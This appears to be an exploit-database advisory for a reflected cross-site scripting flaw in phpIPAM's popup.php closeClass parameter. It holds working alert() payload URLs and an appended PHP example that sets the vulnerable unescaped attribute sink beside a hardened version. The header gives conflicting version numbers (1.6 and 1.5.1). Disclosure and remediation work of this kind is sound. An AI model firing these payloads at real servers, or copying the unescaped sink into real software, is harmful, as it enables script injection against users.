# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/phpipam/phpipam]
# Software Link: [https://github.com/phpipam/phpipam]
# Version: [1.5.1]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2023-24657]

PoC:
1) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

Details:
{
    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}

[Replace Your Domain Name]
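
Mitigation sketch, added here as an example (not phpIPAM source and not the exploit author's code): the reported sink pattern, an unescaped request value written into a quoted HTML attribute, beside a hardened form that allowlists the value and encodes it for attribute context. The function names, the button markup and the fallback class name are assumptions; the sample inputs are the decoded closeClass values from the PoC URLs above plus one constructed benign value.

```php
<?php
// Added example. Markup and function names are hypothetical, not phpIPAM's.

// Pattern from the advisory's "Sink" field: the request value reaches an
// HTML attribute with no escaping, so a double quote ends the attribute.
function render_close_button_vulnerable(array $request): string
{
    $class = $request['closeClass'] ?? '';
    return '<button class="btn ' . $class . '">Close</button>';
}

// Hardened: (1) accept only a single CSS class token, (2) still encode for
// attribute context so a future change to the allowlist cannot reopen it.
function render_close_button_hardened(array $request): string
{
    $class = $request['closeClass'] ?? '';
    if (!is_string($class)
        || !preg_match('/\A[A-Za-z][A-Za-z0-9_-]{0,63}\z/', $class)) {
        $class = 'hidePopups'; // hypothetical safe default
    }
    $safe = htmlspecialchars($class, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<button class="btn ' . $safe . '">Close</button>';
}

// Sample inputs: one constructed benign value, then the two PoC values
// from the advisory after URL decoding.
$samples = [
    'hidePopup2',
    '" onclick="alert(1)"',
    '"><script>alert(1)</script>',
];

foreach ($samples as $value) {
    $request = ['closeClass' => $value];
    echo 'input:      ', $value, PHP_EOL;
    echo 'vulnerable: ', render_close_button_vulnerable($request), PHP_EOL;
    echo 'hardened:   ', render_close_button_hardened($request), PHP_EOL;
    echo PHP_EOL;
}
```

Run with the PHP CLI; for both PoC values the hardened output falls back to the default class, while the vulnerable output shows the attribute being closed by the injected quote.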